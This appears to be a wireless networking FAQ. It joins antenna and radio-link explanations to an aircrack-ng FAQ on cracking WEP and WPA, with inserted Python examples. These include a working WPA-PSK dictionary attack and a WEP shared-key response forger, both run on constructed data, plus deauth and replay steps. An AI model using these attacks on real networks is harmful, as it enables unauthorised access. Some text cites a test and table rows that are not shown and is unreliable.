Q: What are the differences between an Omni antenna, Panel antenna, Parabolic antenna, Sector antenna, and the Yagi antenna?

A: Antenna differences: An Omni antenna is omnidirectional. In other words, the signal is transmitted and received equally in all directions. (Ignoring such influences as trees, terrain, large buildings, etc.)

Panel antennae, Parabolic antennae, Sector antennae, and Yagi antennae are all directional antennae. They all have different applications, and which one fits is highly dependent on the particular setup.

For example: A Sector antenna is usually designed to cover a wide pie-shaped area. The width of the sector they cover typically ranges from 60° to 180°. Usually they are used to provide specific regional coverage for broadcast areas of WISPs (Wireless Internet Service Providers) or similar applications.

Q: What is all this talk about dB and deciBels. I thought radio power is expressed in Watts?
Q: Why are deciBels expressed in negative numbers in NetStumbler?
Q: Why doesn’t SNR equal Signal/Noise?

A: Decibels (dB) express a ratio, so a dB figure only means something relative to a known reference: a power in watts or milliwatts, or a voltage in volts, millivolts or microvolts. For power, dB is expressed as:

dB = 10 * log10(P / Pref)

Now with that in mind:

Transmitters, such as those used in commercial microwave links, are referenced to 1 milliwatt, and the result is written dBm. So

0 dBm = 10 * log10(1 mW / 1 mW)

therefore a 1 watt transmitter is a +30 dBm transmitter, a 1/2 watt transmitter is +27 dBm, and a 0 dBm transmitter is 1 milliwatt:

0 dBm = 1 milliwatt
10 dBm = 10 milliwatts
20 dBm = 100 milliwatts
30 dBm = 1000 milliwatts or 1 watt

Received signal strength reads as a negative number because free-space and path loss leave far less than 1 mW at the receiver; a negative dBm value simply means the power is below 1 mW. Keep the two units apart: dBm is an absolute power level, while a plain dB figure is a ratio, so a negative dB value represents a loss and a positive one represents a gain.

The noise floor is the level of the background noise, which comes from man-made devices, from nature (such as the sun) and from the receiver's own thermal noise.

Your signal to noise ratio (SNR) is how far your signal is above that noise floor. So if your noise floor is -92 dBm and your signal is -82 dBm, then your SNR is 10 dB. Note that the SNR in dB is obtained by subtracting the noise value from the signal value instead of dividing, because both values are already logarithmic (dBm). Thus:

SNR (dB) = 10 * log10( S(mW) / N(mW) ) = S(dBm) – N(dBm)
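The same arithmetic as a small set of Python helpers. This is an added example, not part of the original FAQ: dBm to milliwatts and back, SNR as a subtraction in dB and as a ratio in milliwatts, the percentage that a dB step represents, the antenna-gain subtraction used in the measurement question further down the page, and the rows of the dBm-to-watt table near the end. Function names are mine.

```python
import math


def dbm_to_mw(dbm: float) -> float:
    """Absolute power: dBm -> milliwatts (the reference is 1 mW)."""
    return 10 ** (dbm / 10)


def mw_to_dbm(mw: float) -> float:
    """Absolute power: milliwatts -> dBm. Zero or negative power has no dBm value."""
    if mw <= 0:
        raise ValueError("power must be positive")
    return 10 * math.log10(mw)


def db_to_ratio(db: float) -> float:
    """Relative quantity: a plain dB figure is a power ratio, not a power."""
    return 10 ** (db / 10)


def percent_change(db: float) -> float:
    """Percentage of power gained (positive) or lost (negative) for a dB change."""
    return (db_to_ratio(db) - 1) * 100


def snr_db(signal_dbm: float, noise_dbm: float) -> float:
    """SNR in dB: subtract, because both inputs are already logarithmic."""
    return signal_dbm - noise_dbm


def snr_linear(signal_dbm: float, noise_dbm: float) -> float:
    """The same SNR as a plain ratio, computed the long way for comparison."""
    return dbm_to_mw(signal_dbm) / dbm_to_mw(noise_dbm)


def antenna_gain_db(card_only_dbm: float, with_antenna_dbm: float) -> float:
    """Rough gain measurement: reading with the antenna minus reading without it."""
    return with_antenna_dbm - card_only_dbm


def dbm_table(start: int = 0, stop: int = 47) -> list:
    """Rows of (dBm, human-readable power) like the conversion table on this page."""
    rows = []
    for dbm in range(start, stop + 1):
        mw = dbm_to_mw(dbm)
        rows.append((dbm, f"{mw / 1000:.3g} W" if mw >= 1000 else f"{mw:.3g} mW"))
    return rows


if __name__ == "__main__":
    print("1/2 W =", round(mw_to_dbm(500), 1), "dBm")
    print("SNR of -82 dBm over a -92 dBm noise floor:", snr_db(-82, -92), "dB")
    print("+1 dB = %+.1f %%, -1 dB = %+.1f %%, +3 dB = %+.1f %%"
          % (percent_change(1), percent_change(-1), percent_change(3)))
    for dbm, power in dbm_table(0, 47):
        print(f"{dbm:3d} dBm = {power}")
```

Note that a 1 dB gain is a 26% increase but a 1 dB loss is a 21% decrease: the ratio is symmetric in dB, not in percent.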

Q: I’ve been told that omnidirectional antennae will increase the range as the dB increases, but that the pattern gets flatter, and I may miss detecting APs. What does this mean?

A: For those of you who are scratching their heads over this, this may help visualize it better. Think of it this way: omnidirectional antenna patterns are doughnut shaped. As you increase the dB rating, the doughnut’s volume doesn’t change; it gets flatter. It squishes flat. (yech!)

Here are two views of antenna patterns, a 5 dB and a 10 dB, using the same theoretical tx/rx point. (BTW, not to belabor the obvious, but someone will probably point this out if I don’t: the diagrams are not to scale with each other.) The top diagram shows the patterns from above, while the lower diagram shows the pattern from the side. The black is the 5 dB pattern, the blue is the 10 dB pattern, and the red are APs that someone is trying to find.

AP1. Not detected. Within range of the 10 dB, but below its signal area. Out of range for the 5 dB.
AP2. Detected by the 5 dB. Within range of both, but only within the signal area of the 5 dB. The 10 dB would not have detected it.
AP3. Not detected. Within range of the 10 dB, but above its signal area. Out of range for the 5 dB.
AP4. Detected by the 10 dB. Barely within range.
AP5. Detected by either the 5 dB or the 10 dB.
Q: What about adding multiple antennae? Can you run two omnis in tandem, or would the additional impedance screw up both?

A: Directly connecting two antennae to one lead will cause impedance problems. You’d need a splitter/combiner or switch for it to work right. That adds loss to the system, so you’d probably not gain much.

NOTE: Since this was first answered, some reasonably priced, low-loss splitter/combiners have appeared on the 2.4 GHz consumer market. Links will be added here as time permits.
Q: What does polarization mean?
Q: Is the radiation pattern of the horizontal simply flipped 90 degress as opposed to the vertical?
Q: Very few antennea seem to be horizontal polarized and tend to cost quite a bit more. Why are horizontal polarized antennae costlier?
Q: I built a homebrew antenna. How do I find its polarization?

A: Here is an answer from:

Antenna Polarization

Polarization is defined as the orientation of the electric field of an electromagnetic wave. Polarization is in general described by an ellipse. Two often used special cases of elliptical polarization are linear polarization and circular polarization. The initial polarization of a radio wave is determined by the antenna that launches the waves into space. The environment through which the radio wave passes on its way from the transmit antenna to the receive antenna may cause a change in polarization.

With linear polarization the electric field vector stays in the same plane. In circular polarization the electric field vector appears to be rotating with circular motion about the direction of propagation, making one full turn for each RF cycle. The rotation may be right-hand or left-hand.

Choice of polarization is one of the design choices available to the RF system designer. For example, low frequency (< 1 MHz) vertically polarized radio waves propagate much more successfully near the earth than horizontally polarized radio waves, because horizontally polarized waves will be cancelled out by reflections from the earth. Mobile radio systems generally use vertical polarization. TV broadcasting has adopted horizontal polarization as a standard. This choice was made to maximize signal-to-noise ratios. At frequencies above 1 GHz, there is little basis for a choice of horizontal or vertical polarization, although in specific applications there may be some possible advantage in one or the other. Circular polarization has also been found to be of advantage in some microwave radar applications to minimize the “clutter” echoes received from raindrops, in relation to the echoes from larger targets such as aircraft. Circular polarization can also be used to reduce multipath.

————–

Basically, the radiation pattern is independent of the polarization. If you take two vertically polarized antennae and turn one on its side, you’ll receive almost no signal between the two; this is called cross-polarization. If you’re having trouble visualizing polarization, think of it in terms of light; it works the same way with other electromagnetic radiation such as WiFi. LCD panels work on the principle of polarization, by the way: the dark bits of the screen have the polarization 90 degrees off.

The reason the vertically polarized omni antennae tend to be cheaper is that they are usually collinears, which are cheap and easy to make because basically they are just plastic tubes with some wire inside. A slotted waveguide is an example of a horizontally polarized omni; they are big metal tubes machined to close tolerances, so you can see why the materials and labor cost more.
Q: How do you measure the gain? I would like to visually see the difference of my antenna vs. the plain card.

A: Below is the quick and dirty way. Be advised this is very rough and very prone to error.

1) Get the best (strongest) signal level reading from a known AP using the card alone. This is X dBm (e.g. -58 dBm).
2) Don’t change the location or orientation. Plug in the antenna and get a new reading. This is Y dBm (e.g. -50 dBm).

Y - X = antenna gain in dB. (Subtract: both readings are negative dBm values, and the difference between two dBm values is a plain dB ratio.)

-50 dBm - (-58 dBm) = 8 dB.

In this example the gain would be 8 dB. Anything else that changed between the two readings (someone walking past, the AP's own rate or power adaptation) lands in that number too, which is why it is only an estimate.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300,000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1,500,000 IVs; if you’re out of luck you may need two million IVs, or more.
There’s no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump-ng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250,000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key isn’t found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

With the introduction of the PTW technique in aircrack-ng 0.9, the number of data packets required to crack WEP is dramatically lowered. Using this technique, 40-bit WEP (64 bit key) can be cracked with as few as 20,000 data packets and 104-bit WEP (128 bit key) with 40,000 data packets.
There is one critical requirement: the captured data packets must be ARP packets, which is why the ARP request replay attack of aireplay-ng is normally used to generate them.

How can I know what is the key length ?

You can’t know the key length: there is no information about it at all in the wireless packets, which is why you have to try different lengths. Most of the time it’s a 128-bit key.

How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesn’t mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required.

FYI, it’s not possible to pre-compute one large generic table of Pairwise Master Keys the way rainbowcrack does, since the passphrase is salted with the ESSID: a table of PMKs is only good for the one ESSID it was built for.
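The handshake attack and the ESSID-salt remark, as an added example that is not part of the aircrack-ng FAQ and uses no aircrack-ng code: the 802.11i PMK derivation (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as the salt), the PRF-512 that expands it into the PTK, and the EAPOL-Key MIC check that a dictionary attack has to repeat for every candidate. The MAC addresses, nonces and message 2 frame are constructed for the example; only the derivations are the standard's.

```python
import hashlib
import hmac

# 802.11i constants (standard values, not assumptions)
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
PTK_LABEL = b"Pairwise key expansion"
# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK. The SSID is the salt, so one passphrase gives a different PMK per network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, label, min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, PTK_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]            # KCK = PTK[0:16] is all the MIC check needs


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC field zeroed, 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 of the four-way handshake (replay counter 1, no key data)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x00"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16               # MIC placeholder
            + b"\x00\x00")               # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def simulate_handshake(passphrase: str, ssid: str) -> dict:
    """What a capture yields: both MACs, both nonces and the MIC'd message 2. All values constructed."""
    aa = bytes.fromhex("001122334455")      # AP (authenticator) MAC
    spa = bytes.fromhex("66778899aabb")     # client (supplicant) MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(snonce)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "msg2": msg2}


def crack_psk(capture: dict, wordlist: list):
    """Dictionary attack: PMK, PTK and MIC are recomputed per candidate; the PBKDF2 step is the cost."""
    observed = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["msg2"]), observed):
            return candidate
    return None


if __name__ == "__main__":
    cap = simulate_handshake("correct horse", "HomeNet")
    print(crack_psk(cap, ["password", "letmein", "correct horse"]))   # -> correct horse
```

The salt is why a precomputed PMK table only helps against networks with the same ESSID; the test below also checks the derivation against the IEEE 802.11 test vector (passphrase "password", SSID "IEEE").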

What are the authentication modes for WEP ?

There are two authentication modes for WEP:

  • Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked meaning association is always granted. However if your key is incorrect you won’t be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will timeout.
  • Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it’s never enabled by default.
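The keystream recovery that makes Shared Key Authentication unsafe, as an added example (mine, not from aircrack-ng): a toy WEP built from RC4 and CRC-32, the legitimate challenge/response, and an attacker who XORs the cleartext challenge with the encrypted reply to obtain the keystream for that IV and then answers a fresh challenge without ever learning the key. The key, IV and challenges are constructed; no 802.11 framing is modelled.

```python
import zlib

WEP_KEY = bytes.fromhex("0102030405")   # constructed 40-bit key; the attacker never learns it


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV||key) XOR (plaintext || ICV). The 3-byte IV travels in the clear."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def ap_verify_response(key: bytes, challenge: bytes, frame: bytes) -> bool:
    """What the AP does with authentication frame 3: decrypt, check the ICV, compare to its challenge."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    data, tail = body[:-4], body[-4:]
    return tail == icv(data) and data == challenge


# --- legitimate client ---
def client_response(key: bytes, challenge: bytes) -> bytes:
    return wep_encrypt(key, b"\x0a\x0b\x0c", challenge)   # IV chosen by the client


# --- passive attacker ---
def recover_keystream(challenge: bytes, frame: bytes) -> tuple:
    """Known plaintext (challenge || ICV) XOR observed ciphertext = keystream for that IV."""
    return frame[:3], xor(challenge + icv(challenge), frame[3:])


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Reuse the recovered IV/keystream pair: WEP never rejects a repeated IV."""
    body = new_challenge + icv(new_challenge)
    return iv + xor(body, keystream[:len(body)])


def demo() -> bool:
    challenge1 = bytes(range(128))                   # AP's 128-byte challenge, sent in the clear
    frame3 = client_response(WEP_KEY, challenge1)    # legitimate client answers it
    assert ap_verify_response(WEP_KEY, challenge1, frame3)
    iv, ks = recover_keystream(challenge1, frame3)   # attacker sniffed both frames
    challenge2 = bytes(reversed(range(128)))         # AP's challenge to the attacker
    return ap_verify_response(WEP_KEY, challenge2, forge_response(iv, ks, challenge2))
```

The 132 recovered keystream bytes are exactly what aireplay-ng's fake authentication uses when it is given a PRGA file; with Open System Authentication there is no encrypted challenge to learn from, which is why the flawed mode is the one that is off by default.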

Can I use Wireshark/Ethereal to capture 802.11 packets ?

Under Linux, simply setup the card in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.

Can Wireshark/Ethereal decode WEP or WPA data packets ?

Recent versions of Ethereal and Wireshark can decrypt WEP. Go to Edit → Preferences → Protocols → IEEE 802.11, select 1 in the “WEP key count” and enter your WEP key below.

Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit → Preferences → Protocols → IEEE 802.11, select “Enable decryption”, and fill in the key according to the instructions in the preferences window. You can also select “Decryption Keys…” from the wireless toolbar if it’s displayed.

How to use spaces, double quote and single quote, etc. in AP names?

  • You have to prefix those special characters with a “\”. This is called escaping a special character. Examples: with\’singlequote, with\”doublequote.
  • You also need to handle the symbol ”&” the same way. Example: A\&B.
  • You can use single quotes. Examples: ‘with space’, ‘with”doublequote’.
  • As well, you can use double quotes. Examples: “with space”, “with’singlequote”.

NOTE: If you enclose the AP name in single or double quotes, then you don’t also need to escape special characters within the single or double quotes.

IMPORTANT EXCEPTION: If the AP name contains ”!” then special care must be taken. The reason is that the bash interpreter thinks you want to repeat a previous command. Your options are:

  • Use single quotes as in ‘name!with!bang’.
  • Escape the ”!” as in name\!with\!bang.
  • Use double quotes plus the escape as in “name\!with\!bang”

Sometimes the AP name contains leading or trailing spaces. These can be very hard to identify from the airodump-ng screen. Here are a few methods to deal with this situation:

  • The airodump-ng text file includes the SSID (AP name) length. So you can compare the length in the text file to the count of visible characters. If the airodump-ng text file count is greater then you know that the SSID has leading or trailing spaces.
  • Use wireshark to look at the beacon. Unless the SSID is hidden, the SSID is in quotes and you should be able to see leading/trailing spaces.
  • The 1.0svn version of aireplay-ng will automatically pull the correct SSID from the beacon for you assuming it is not hidden. Simply omit the SSID parameter from aireplay-ng.
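Two of the points above, as an added Python example rather than anything from the aircrack-ng project: pulling the SSID out of a beacon frame body with its exact length (so leading or trailing spaces and hidden SSIDs show up), and building a shell-safe aireplay-ng command line for it with shlex.quote. The beacon body, BSSID and interface name are constructed for the example; the aireplay-ng -1 fake-authentication syntax is the tool's own.

```python
import shlex

FIXED_PARAMS_LEN = 12   # beacon body: timestamp(8) + interval(2) + capability(2) precede the IEs
TAG_SSID = 0
TAG_RATES = 1


def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value information elements of a beacon frame body."""
    ies, i = {}, FIXED_PARAMS_LEN
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def ssid_from_beacon(body: bytes):
    """Exact SSID, whitespace included; None for a hidden SSID (length 0 or all NUL bytes)."""
    raw = parse_ies(body).get(TAG_SSID)
    if not raw or raw == b"\x00" * len(raw):
        return None
    return raw.decode("utf-8", errors="replace")


def hidden_whitespace(ssid: str) -> bool:
    """True when the name is longer than what the airodump-ng screen appears to show."""
    return ssid != ssid.strip()


def aireplay_fakeauth(ssid: str, bssid: str, iface: str) -> str:
    """Shell-safe aireplay-ng fake-authentication command line for any SSID.
    shlex.quote single-quotes anything containing spaces, quotes, & or !, so the
    bash history character never gets a chance to expand."""
    argv = ["aireplay-ng", "-1", "0", "-e", ssid, "-a", bssid, iface]
    return " ".join(shlex.quote(a) for a in argv)


def quoting_round_trips(ssid: str, bssid: str, iface: str) -> bool:
    """Re-parse the quoted line the way the shell will and check the SSID argument survived intact."""
    return shlex.split(aireplay_fakeauth(ssid, bssid, iface))[4] == ssid


def build_beacon_body(ssid: bytes) -> bytes:
    """Constructed beacon body: zeroed fixed fields, then an SSID IE and a Supported Rates IE."""
    rates = bytes([0x82, 0x84, 0x8B, 0x96])   # 1, 2, 5.5, 11 Mbps with the basic-rate bit set
    return (b"\x00" * FIXED_PARAMS_LEN
            + bytes([TAG_SSID, len(ssid)]) + ssid
            + bytes([TAG_RATES, len(rates)]) + rates)


if __name__ == "__main__":
    name = ssid_from_beacon(build_beacon_body(b" Cafe Wi-Fi! "))
    print(repr(name), "leading/trailing whitespace:", hidden_whitespace(name))
    print(aireplay_fakeauth(name, "00:14:6C:7E:40:80", "wlan0mon"))
```

Printing the name with repr() is the quickest way to make a stray space visible; the beacon's SSID length byte is authoritative, not what a terminal shows.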

What is the size of ARP packets ?

When captured through a wireless interface, 68 bytes is typical for ARP packets originating from wireless clients, and 86 bytes is typical for ARP requests from wired clients relayed by the AP.

On Ethernet, an ARP packet is 28 bytes of ARP inside a 14-byte Ethernet header, 42 bytes in all, which the sender pads to the 60-byte Ethernet minimum. When this is relayed by a wireless access point the 18 bytes of padding stay, and the wireless headers bring the frame to 86 bytes: a 24-byte 802.11 data header, a 4-byte WEP IV, an 8-byte LLC/SNAP header, the 46-byte padded payload and a 4-byte WEP ICV. An ARP sent by a wireless client carries no padding, so it is 24 + 4 + 8 + 28 + 4 = 68 bytes. These sizes assume WEP; without the IV and ICV each frame is 8 bytes shorter.

What are the allowed rates ?

Modulation     Allowed rates
DSSS / CCK     1M, 2M, 5.5M, 11M
OFDM (a/g)     6M, 9M, 12M, 18M, 24M, 36M, 48M, 54M

How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex character when going from hex to ascii.

LatinSud has developed a very useful tool – Javascript WEP Conversion Tool. It can perform a variety of WEP, ASCII and passphrase conversions.

Why do I have bad speeds when i’m too close to the access point?

Problem: The wireless card behaves badly if the signal is too strong. If you are too close (1-2m) to the access point, you get high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s.

This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

So, is it a driver problem or is it my network hardware?

Neither, really. It’s a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when you’re close to the access point. If you don’t want or you don’t have a wire, you can also decrease output power of your Access point or your card.

Why do I get ioctl(SIOCGIFINDEX) failed: No such device ?

Double check that your device name is correct and that you haven’t forgotten a parameter on the command line.

Why do I get ‘SIOCSIFFLAGS : No such file or directory’ error message

Some drivers require a firmware to be loaded (bcm43xx, prism54, zd1211, …). The driver does it by itself when loaded.
In this case, the driver didn’t find it because the firmware was not in the right place. To find the firmware’s correct location, read the driver documentation.

My network card changes it’s name from eth0 to eth1

Or even to eth2, or from wlan0 to wlan1, and so on. You know what the symptoms mean if you suffer from this problem. It happens when you change your MAC address and udev thinks it has detected a new network card. udev records the new card persistently, so the naming stays mixed up even after a reboot.

Solution: Disable this function in UDEV

Open /etc/udev/persistent-net-generator.rules in your prefered text editor

Search for

 KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 	IMPORT{program}="write_net_rules $attr{address}"

and change it to

 #KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\

What is RSSI?

RSSI means Received Signal Strength Indication. It is a measurement of the received radio signal strength, reported by the card in arbitrary, vendor-specific units rather than in dBm, so RSSI values from different chipsets are not directly comparable.

For more information, see http://en.wikipedia.org/wiki/RSSI

What is the difference with long and short preamble?

Every packet is sent with a preamble, which is just a known pattern of bits at the beginning of the packet so that the receiver can sync up and be ready for the real data. According to the standard, this preamble is sent at the basic rate (1 Mbps). There are two kinds of preamble, short and long: the long preamble has a 128-bit SYNC field, while the short preamble’s SYNC field is only 56 bits, so a short-preamble frame spends less airtime before its payload.

Will I get better range with maximum output power?

No, this is a false assumption in most situations.

In a home environment, the best output power is not always the maximum. In most situations, 30mw is enough. However, if you are a long distance from the AP, then yes, maximum output power is the best.

Do wifi amplifiers have a better range?

No, amplifiers are not a very good idea because:

  1. Amplifiers also amplify noise and that’s not a good thing for link quality
  2. With high amplification, you could get a headache

You are much better off purchasing a good antenna with high gain.

My card says that I have 20dBm (100mW) but i only have 18dBm, why?

Most cards are rated at 100 mW (20 dBm) as radiated power including the supplied 2 dBi antenna: 18 dBm from the card plus 2 dBi of antenna gain is 20 dBm.

In 802.11a and 802.11g the output power is typically lower, around 30 mW, because of the modulation: OFDM has a much higher peak-to-average ratio than CCK and needs a more linear, backed-off amplifier.

Will I have better reception with stronger transmit power?

No, the transmit power is not linked with receiving at all. For receiving, you should check the receive sensitivity of your card. As well, you are much better off purchasing a good antenna with high gain

Understanding Radio Line of Sight

Radio transmission requires a clear path between antennas known as radio line of sight. It is necessary to understand the requirements for radio line of sight when designing a network operating in the 2.4 GHz ISM band.

Line of sight is the direct free-space path that exists between two points. Using binoculars on a clear day, it is easy to determine if visual line of sight exists between two points that are miles apart. To have a clear line of sight there must be no obstructions between the two locations. Often this means that the observation points must be high enough to allow the viewer to see over any ground-based obstructions.

The following obstructions might obscure a visual link:

  • Topographic features, such as mountains
  • The curvature of the Earth
  • Buildings and other man-made objects
  • Trees

If any of these obstructions rise high enough to block the view from end to end, there is no visual line of sight.


Obstructions that can interfere with visual line of sight can also interfere with radio line of sight. But one must also consider the Fresnel effect. If a hard object, such as a mountain ridge or building, is too close to the signal path, it can damage the radio signal or reduce its strength. This happens even though the obstacle does not obscure the direct, visual line of sight.

The Fresnel zone for a radio beam is an elliptical area immediately surrounding the visual path. It varies in thickness depending on the length of the signal path and the frequency of the signal.


As shown in the picture above, when a hard object protrudes into the signal path within the Fresnel zone, knife-edge diffraction can deflect part of the signal and cause it to reach the receiving antenna slightly later than the direct signal. Since these deflected signals are out of phase with the direct signal, they can reduce its power or cancel it out altogether. If trees or other ‘soft’ objects protrude into the Fresnel zone, they can attenuate (reduce the strength of) a passing signal. In short, the fact that you can see a location does not mean that you can establish a quality radio link to that location.
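The Fresnel zone the page describes, carried into numbers as an added example (not from the original page): the first-zone radius from the two distances and the frequency, the extra height that Earth curvature adds (the k = 4/3 refraction factor is the usual planning assumption), the common rule of thumb of keeping 60% of the first zone clear, and a margin check over a constructed list of obstacles. The antenna heights, path length and obstacles in the test are constructed inputs.

```python
import math

C = 299_792_458.0            # m/s
EARTH_RADIUS_M = 6_371_000.0
K_FACTOR = 4 / 3             # standard-atmosphere refraction: effective Earth radius is 4/3 of the real one


def fresnel_radius_m(d1_m: float, d2_m: float, freq_hz: float, zone: int = 1) -> float:
    """Radius of the n-th Fresnel zone at a point d1 from one antenna and d2 from the other."""
    wavelength = C / freq_hz
    return math.sqrt(zone * wavelength * d1_m * d2_m / (d1_m + d2_m))


def earth_bulge_m(d1_m: float, d2_m: float, k: float = K_FACTOR) -> float:
    """Height the Earth's curvature adds to an obstacle, relative to the straight path."""
    return d1_m * d2_m / (2 * k * EARTH_RADIUS_M)


def required_clearance_m(d1_m: float, d2_m: float, freq_hz: float, fraction: float = 0.6) -> float:
    """Rule of thumb: keep 60% of the first Fresnel zone free of obstacles."""
    return fraction * fresnel_radius_m(d1_m, d2_m, freq_hz)


def path_height_m(h1_m: float, h2_m: float, d1_m: float, total_m: float) -> float:
    """Height of the straight line between the two antennas at distance d1 from the first."""
    return h1_m + (h2_m - h1_m) * d1_m / total_m


def link_margins(h1_m, h2_m, total_m, freq_hz, obstacles) -> list:
    """Per obstacle (distance_from_end1_m, height_m): clearance margin in metres; negative means blocked."""
    margins = []
    for d1, obstacle_h in obstacles:
        d2 = total_m - d1
        needed = obstacle_h + earth_bulge_m(d1, d2) + required_clearance_m(d1, d2, freq_hz)
        margins.append(path_height_m(h1_m, h2_m, d1, total_m) - needed)
    return margins


def link_is_clear(h1_m, h2_m, total_m, freq_hz, obstacles) -> bool:
    return all(m >= 0 for m in link_margins(h1_m, h2_m, total_m, freq_hz, obstacles))


if __name__ == "__main__":
    print("F1 at the midpoint of a 1 km 2.4 GHz path: %.2f m" % fresnel_radius_m(500, 500, 2.4e9))
    print("F1 at the midpoint of a 10 km 2.4 GHz path: %.2f m" % fresnel_radius_m(5000, 5000, 2.4e9))
    print("Earth bulge at the midpoint of 10 km: %.2f m" % earth_bulge_m(5000, 5000))
    # two 10 m masts 1 km apart, a 6 m tree 400 m from the first mast
    print("margins:", [round(m, 2) for m in link_margins(10, 10, 1000, 2.4e9, [(400, 6)])])
```

The midpoint radius is what matters for mast height: a 1 km link at 2.4 GHz needs about 3.4 m of clearance above the tallest thing near the middle, a 10 km link about 10.6 m plus 1.5 m of Earth bulge, which is why a visually clear path can still be a poor radio path.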

There are several options to establish or improve the line of sight:

  • Raise the antenna mounting point on the existing structure
  • Build a new structure, i.e. radio tower, which is tall enough to mount the antenna
  • Increase the height of an existing tower
  • Locate a different mounting point, i.e. building or tower, for the antenna
  • Cut down problem trees
  • Use a near-line-of-sight technology such as 802.11a (with outdoor long range extensions enabled) or WiMAX.


dBm to Watt Conversion Table

dBm   Power      dBm   Power      dBm   Power
 0    1.0 mW     16    40 mW      32    1.6 W
 1    1.3 mW     17    50 mW      33    2.0 W
 2    1.6 mW     18    63 mW      34    2.5 W
 3    2.0 mW     19    79 mW      35    3.2 W
 4    2.5 mW     20    100 mW     36    4.0 W
 5    3.2 mW     21    126 mW     37    5.0 W
 6    4 mW       22    158 mW     38    6.3 W
 7    5 mW       23    200 mW     39    8.0 W
 8    6 mW       24    250 mW     40    10 W
 9    8 mW       25    316 mW     41    13 W
